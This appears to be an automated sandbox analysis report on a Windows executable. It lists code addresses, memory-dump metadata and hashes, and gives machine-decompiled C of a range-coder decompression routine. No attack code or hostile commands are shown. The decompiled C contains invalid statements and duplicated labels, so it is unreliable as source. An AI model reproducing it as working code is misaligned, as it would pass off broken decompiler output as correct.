                                                                                0x00406742
                                                                                0x00406744
                                                                                0x00406747
                                                                                0x00406747
                                                                                0x00406762
                                                                                0x00406769
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x00406407
                                                                                0x0040640a
                                                                                0x00406440
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406573
                                                                                0x00406573
                                                                                0x00406576
                                                                                0x00406578
                                                                                0x00406802
                                                                                0x00000000
                                                                                0x00406802
                                                                                0x0040657e
                                                                                0x00406581
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406587
                                                                                0x0040658b
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x00000000
                                                                                0x0040658e
                                                                                0x0040640c
                                                                                0x0040640e
                                                                                0x00406410
                                                                                0x00406412
                                                                                0x00406415
                                                                                0x00406416
                                                                                0x00406418
                                                                                0x0040641a
                                                                                0x0040641d
                                                                                0x00406420
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000
                                                                                0x0040683f
                                                                                0x0040668c
                                                                                0x00406613
                                                                                0x00406610
                                                                                0x00000000
                                                                                0x00406247

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9559e631de12ac190fc3dbda59775f92caf85e18026e172f4b25c47ed6f47b1
                                                                                • Instruction ID: 8e1ca3658344a45a01c0768cccd91d1ca6eab8257e9a2baa8b19e53c632fc951
                                                                                • Opcode Fuzzy Hash: d9559e631de12ac190fc3dbda59775f92caf85e18026e172f4b25c47ed6f47b1
                                                                                • Instruction Fuzzy Hash: D8713371D00229CBDF24CFA8C8547AEBBB1FB48305F15856AD806BB281D7789A86DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406361, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00406361() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406847))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
